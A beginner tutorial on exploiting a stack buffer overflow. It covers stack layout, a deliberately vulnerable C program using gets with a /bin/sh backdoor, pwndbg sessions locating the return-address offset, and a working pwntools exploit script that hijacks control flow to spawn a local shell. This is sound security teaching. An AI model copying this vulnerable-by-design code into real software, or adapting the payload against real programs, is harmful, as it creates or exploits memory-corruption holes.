A Pwn Journey from Scratch - A First Look at Stack Overflow

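Preface

Why can a jumble of characters crash a program? Why can a carefully crafted string make it execute arbitrary code? This article takes you into the world of Pwn: how a stack overflow happens, and how to exploit it to run arbitrary code.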

Stack

A stack is a data structure. Computers use it to store the local variables, return addresses and other bookkeeping of function calls.

+---------------------+
|     0x804000        |  <- top of stack (sp)
+---------------------+
|        ...          |
+---------------------+
|     0x803000        |
+---------------------+
|        ...          |
+---------------------+
|     0x802000        |  <- bottom of stack (bp)
+---------------------+
  • The stack is a last-in, first-out (LIFO) data structure: the element pushed last is popped first. The values in the diagram above are pushed like this:

    push 0x802000
    ...
    push 0x803000
    ...
    push 0x804000

    Popping them looks like this:

    pop rax ; rax = 0x804000
    pop rbx ; rbx = the value pushed just before 0x804000
    ...
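  • In the operating system's memory layout, the stack grows from high addresses toward low addresses. This means the top of the stack is at a lower address than the bottom. A sketch of the memory layout: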

    +-------------------------------+  high addresses
    |         Kernel space          |
    |-------------------------------|
    |         Kernel modules/drivers|
    |-------------------------------|
    |         Kernel stack/data     |
    +-------------------------------+
    |         User space            |
    |-------------------------------|
    |         Stack (grows down)    |
    |-------------------------------|
    |         Unallocated space     |
    |-------------------------------|
    |         Heap (grows up)       |
    |-------------------------------|
    |         BSS (uninitialized)   |
    |-------------------------------|
    |         Data (initialized)    |
    |-------------------------------|
    |         Text (code)           |
    +-------------------------------+  low addresses

With this stack structure, a called function can easily hand the program's control flow (the PC) back to its caller.
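
To make the push/pop and call/return behaviour concrete, here is a minimal Python sketch of a stack that grows toward lower addresses. The `TinyStack` class, its 8-byte slot size, the starting address and the example return address are all illustrative assumptions; this is a toy model, not how a real CPU or OS is implemented.

```python
class TinyStack:
    """Toy model of a downward-growing stack (hypothetical, for illustration)."""

    SLOT = 8  # assume 8-byte slots, as on x86-64

    def __init__(self, base=0x7FFFFFFFE000):
        self.sp = base      # stack pointer starts at the bottom (highest address)
        self.memory = {}    # address -> value

    def push(self, value):
        self.sp -= self.SLOT          # growing the stack lowers sp
        self.memory[self.sp] = value

    def pop(self):
        value = self.memory.pop(self.sp)
        self.sp += self.SLOT          # shrinking the stack raises sp
        return value


stack = TinyStack()
bottom = stack.sp

# LIFO: the last value pushed is the first one popped.
for value in (0x802000, 0x803000, 0x804000):
    stack.push(value)
assert stack.sp < bottom          # the top of the stack is at a lower address
first_popped = stack.pop()
second_popped = stack.pop()

# call/ret: `call` pushes the return address, `ret` pops it into the PC.
return_address = 0x40115D         # example value only
stack.push(return_address)        # what `call` does
pc = stack.pop()                  # what `ret` does
print(hex(first_popped), hex(second_popped), hex(pc))
```

Because `ret` simply pops whatever value sits at the top of the stack, anything that can change that value can change where the program goes next.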

A simple stack overflow

Write a simple C program

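#include <stdio.h>
#include <stdlib.h>

int main() {
    char name[0x10];  /* 16-byte buffer on the stack */
    puts("Enter your name: ");
    gets(name);  /* no bounds check: longer input overflows name */
    return 0;
}

/* Never called by the program; this is where we will redirect execution. */
void backdoor() {
    system("/bin/sh");
}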

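Compile it with the following command. -fno-stack-protector disables the stack canary, -no-pie keeps the code at fixed addresses, and -std=c89 selects a C standard that still declares gets.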

gcc main.c -o main -fno-stack-protector -no-pie -std=c89

When run, the program prompts for a name. If we enter a string that is too long, it crashes

$ ./main
Enter your name:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[1]    47329 segmentation fault (core dumped)  ./main

Now let's use gdb to analyze why the program crashes

pwndbg> b main
Breakpoint 1 at 0x40114a
pwndbg> r
Starting program: /home/lhon901/Code/cpp/main
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Breakpoint 1, 0x000000000040114a in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────
 RAX  0x7ffff7f6de28 (environ) —▸ 0x7fffffffe108 —▸ 0x7fffffffe541 ◂— 'HOME=/home/lhon901'
 RBX  0
 RCX  0x403df0 —▸ 0x401110 ◂— endbr64
 RDX  0x7fffffffe108 —▸ 0x7fffffffe541 ◂— 'HOME=/home/lhon901'
 RDI  1
 RSI  0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
 R8   0x7ffff7f66680 —▸ 0x7ffff7f68000 ◂— 0
 R9   0x7ffff7f68000 ◂— 0
 R10  0x7fffffffdd10 ◂— 0x800000
 R11  0x203
 R12  0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
 R13  1
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 ◂— 0
 R15  0x403df0 —▸ 0x401110 ◂— endbr64
 RBP  0x7fffffffdfd0 —▸ 0x7fffffffe070 —▸ 0x7fffffffe0d0 ◂— 0
 RSP  0x7fffffffdfd0 —▸ 0x7fffffffe070 —▸ 0x7fffffffe0d0 ◂— 0
 RIP  0x40114a (main+4) ◂— sub rsp, 0x10
─────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────
 ► 0x40114a <main+4>      sub    rsp, 0x10              RSP => 0x7fffffffdfc0 (0x7fffffffdfd0 - 0x10)
   0x40114e <main+8>      lea    rax, [rip + 0xeaf]     RAX => 0x402004 ◂— 'Enter your name: '
   0x401155 <main+15>     mov    rdi, rax               RDI => 0x402004 ◂— 'Enter your name: '
   0x401158 <main+18>     call   puts@plt                    <puts@plt>

   0x40115d <main+23>     lea    rax, [rbp - 0x10]
   0x401161 <main+27>     mov    rdi, rax
   0x401164 <main+30>     call   gets@plt                    <gets@plt>

   0x401169 <main+35>     mov    eax, 0                 EAX => 0
   0x40116e <main+40>     leave
   0x40116f <main+41>     ret

   0x401170 <backdoor>    push   rbp
───────────────────────────────────────[ STACK ]───────────────────────────────────────
00:0000│ rbp rsp 0x7fffffffdfd0 —▸ 0x7fffffffe070 —▸ 0x7fffffffe0d0 ◂— 0
01:0008│+008     0x7fffffffdfd8 —▸ 0x7ffff7da76b5 ◂— mov edi, eax
02:0010│+010     0x7fffffffdfe0 —▸ 0x7ffff7fc6000 ◂— 0x3010102464c457f
03:0018│+018     0x7fffffffdfe8 —▸ 0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
04:0020│+020     0x7fffffffdff0 ◂— 0x1ffffe030
05:0028│+028     0x7fffffffdff8 —▸ 0x401146 (main) ◂— push rbp
06:0030│+030     0x7fffffffe000 ◂— 0
07:0038│+038     0x7fffffffe008 ◂— 0x552e4676b89c3459
─────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────
0         0x40114a main+4
   1   0x7ffff7da76b5 None
   2   0x7ffff7da7769 __libc_start_main+137
   3         0x401085 _start+37
───────────────────────────────────────────────────────────────────────────────────────
pwndbg>

Here we set a breakpoint at 0x401169, the instruction right after the call to gets, and continue to it

pwndbg> b *0x401169
Breakpoint 2 at 0x401169
pwndbg> pwn cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
This command is deprecated in Pwndbg. Please use the GDB's built-in syntax for running shell commands instead: !pwn <args>
pwndbg> c
Continuing.
Enter your name:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Breakpoint 2, 0x0000000000401169 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────
*RAX  0x7fffffffdfc0 ◂— 0x6161616261616161 ('aaaabaaa')
 RBX  0
*RCX  0x7ffff7f687c0 ◂— 0
*RDX  0x7ffff7f687c0 ◂— 0
*RDI  0x7fffffffdfc1 ◂— 'aaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
*RSI  0x4056b1 ◂— 0x6361616162616161 ('aaabaaac')
*R8   0x405779 ◂— 0
*R9   0xfbad2288
*R10  0
*R11  0x202
 R12  0x7fffffffe0f8 —▸ 0x7fffffffe525 ◂— '/home/lhon901/Code/cpp/main'
 R13  1
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 ◂— 0
 R15  0x403df0 —▸ 0x401110 ◂— endbr64
 RBP  0x7fffffffdfd0 ◂— 'eaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
*RSP  0x7fffffffdfc0 ◂— 0x6161616261616161 ('aaaabaaa')
*RIP  0x401169 (main+35) ◂— mov eax, 0
─────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────
   0x401155 <main+15>       mov    rdi, rax               RDI => 0x402004 ◂— 'Enter your name: '
   0x401158 <main+18>       call   puts@plt                    <puts@plt>

   0x40115d <main+23>       lea    rax, [rbp - 0x10]
   0x401161 <main+27>       mov    rdi, rax
   0x401164 <main+30>       call   gets@plt                    <gets@plt>

 ► 0x401169 <main+35>       mov    eax, 0                 EAX => 0
   0x40116e <main+40>       leave
   0x40116f <main+41>       ret

   0x401170 <backdoor>      push   rbp
   0x401171 <backdoor+1>    mov    rbp, rsp
   0x401174 <backdoor+4>    lea    rax, [rip + 0xe9b]     RAX => 0x402016 ◂— 0x68732f6e69622f /* '/bin/sh' */
───────────────────────────────────────[ STACK ]───────────────────────────────────────
00:0000│ rax rsp rdi-1 0x7fffffffdfc0 ◂— 0x6161616261616161 ('aaaabaaa')
01:0008│-008           0x7fffffffdfc8 ◂— 'caaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
02:0010│ rbp           0x7fffffffdfd0 ◂— 'eaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
03:0018│+008           0x7fffffffdfd8 ◂— 'gaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
04:0020│+010           0x7fffffffdfe0 ◂— 'iaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
05:0028│+018           0x7fffffffdfe8 ◂— 'kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
06:0030│+020           0x7fffffffdff0 ◂— 'maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
07:0038│+028           0x7fffffffdff8 ◂— 'oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
─────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────
0         0x401169 main+35
   1 0x6161616861616167 None
   2 0x6161616a61616169 None
   3 0x6161616c6161616b None
   4 0x6161616e6161616d None
   5 0x616161706161616f None
   6 0x6161617261616171 None
   7 0x6161617461616173 None
───────────────────────────────────────────────────────────────────────────────────────
pwndbg>

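When execution reaches ret, the instruction tries to return to 0x6161616861616167. That value is a piece of our input rather than a valid code address, so the program crashes.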

─────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────
   0x40115d <main+23>    lea    rax, [rbp - 0x10]
   0x401161 <main+27>    mov    rdi, rax
   0x401164 <main+30>    call   gets@plt                    <gets@plt>

b+ 0x401169 <main+35>    mov    eax, 0                 EAX => 0
   0x40116e <main+40>    leave
 ► 0x40116f <main+41>    ret                                <0x6161616861616167>



───────────────────────────────────────[ STACK ]───────────────────────────────────────
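
The offset of the return address can be read straight off the cyclic pattern: the value that ret tried to jump to, 0x6161616861616167, is eight bytes of the pattern in little-endian order. The following is a minimal sketch using only the standard library; the pattern prefix is copied from the session above, and the variable names are illustrative. (pwntools also ships a `cyclic_find` helper for this kind of lookup.)

```python
import struct

# First 40 bytes of the pattern printed by `pwn cyclic 200` in the session above.
pattern = b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa"

# Address that `ret` tried to jump to, as shown by pwndbg.
bad_return = 0x6161616861616167

# x86-64 is little-endian, so the lowest byte of the value came first in the input.
needle = struct.pack("<Q", bad_return)

# Position of those eight bytes in the input = distance from name to the return address.
offset = pattern.find(needle)
print(needle, offset, hex(offset))
```

The offset comes out as 24 (0x18), which matches the frame layout: 0x10 bytes for name plus 8 bytes for the saved rbp.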

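In this program, our input is stored in the array char name[0x10]. The array is a local variable of main, so it lives on the stack.

The function's return address happens to be stored on the stack as well. Input beyond 0x10 bytes first overwrites the saved rbp, and input beyond 0x18 bytes overwrites the return address, which is what crashes the program.

So if we change the return address to the address of malicious code, will the program execute that code? The answer is yes.

At this point the stack looks like this: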

+--------------------------+
|       "aaaabaaa"         |  <- rsp (start of name)
+--------------------------+
|        ...               |
+--------------------------+
| saved rbp (overwritten)  |  <- rbp
+--------------------------+
|  ret addr (overwritten)  |
+--------------------------+
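
The overwrite can be reproduced with a small simulation. The sketch below models main's frame as a flat byte buffer (16 bytes for name, 8 for the saved rbp, 8 for the return address) and mimics how gets copies input without a length check. The `fake_gets` and `return_address` helpers and the frame model are hypothetical; the saved values are taken from the first pwndbg stack dump.

```python
import struct

NAME_SIZE = 0x10  # char name[0x10]

# Simplified frame, lowest address first: name | saved rbp | return address.
frame = bytearray(NAME_SIZE)
frame += struct.pack("<Q", 0x7FFFFFFFE070)  # saved rbp
frame += struct.pack("<Q", 0x7FFFF7DA76B5)  # return address into libc


def fake_gets(memory, data):
    """Copy data plus a NUL terminator into memory with no check against NAME_SIZE."""
    data = data + b"\x00"
    # Clamp to the model's size only so the toy frame itself stays in bounds.
    memory[0:len(data)] = data[:len(memory)]


def return_address(memory):
    """Read the 8-byte little-endian return address slot of the toy frame."""
    return struct.unpack_from("<Q", memory, NAME_SIZE + 8)[0]


fake_gets(frame, b"Alice")
safe = return_address(frame)          # short input: return address untouched

fake_gets(frame, b"A" * 0x18 + struct.pack("<Q", 0x401170))
hijacked = return_address(frame)      # long input: return address replaced
print(hex(safe), hex(hijacked))
```

A short name leaves the return address alone, while 0x18 filler bytes followed by an address of our choice replace it.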

Because the address contains non-printable characters, we use Python for this challenge.

Use objdump to find the address of backdoor

$ objdump -d main | grep backdoor
0000000000401170 <backdoor>:

Then write the exploit script and save it as exp.py:

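from pwn import *

p = process("./main")  # start the target program

backdoor = 0x401170  # address of the backdoor function
# 0x000000000040101a : ret
ret = 0x40101a
# 0x10 bytes fill name, 0x8 bytes overwrite the saved rbp,
# then the ret gadget and backdoor overwrite the return address
payload = b"a" * (0x10 + 0x8) + p64(ret) + p64(backdoor)

p.sendline(payload)  # send the payload

p.interactive()  # switch to interactive mode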
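
The extra ret is there for stack alignment; a later article covers it in detail.
  • process("./main") starts the program
  • p64(backdoor) packs the address of backdoor as a 64-bit little-endian value
  • sendline(payload) sends the payload followed by a newline
  • p.interactive() switches to interactive mode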
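
For readers without pwntools at hand, the payload bytes can be reproduced with the standard library. This sketch assumes that `p64(x)` with its default little-endian setting produces the same bytes as `struct.pack("<Q", x)`; the helper name `pack64` is made up for illustration.

```python
import struct


def pack64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


backdoor = 0x401170
ret = 0x40101A

padding = b"a" * (0x10 + 0x8)          # name[0x10] + saved rbp
payload = padding + pack64(ret) + pack64(backdoor)

print(pack64(backdoor))                 # b'p\x11@\x00\x00\x00\x00\x00'
print(len(payload))                     # 40
```

None of the payload bytes is a newline (0x0a), which matters because gets stops reading at the first newline.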

Run the Python script

$ python exp.py
[+] Starting local process './main': pid 56742
[*] Switching to interactive mode
Enter your name:
$ whoami
lhon901
$

As shown, backdoor was executed and we got a shell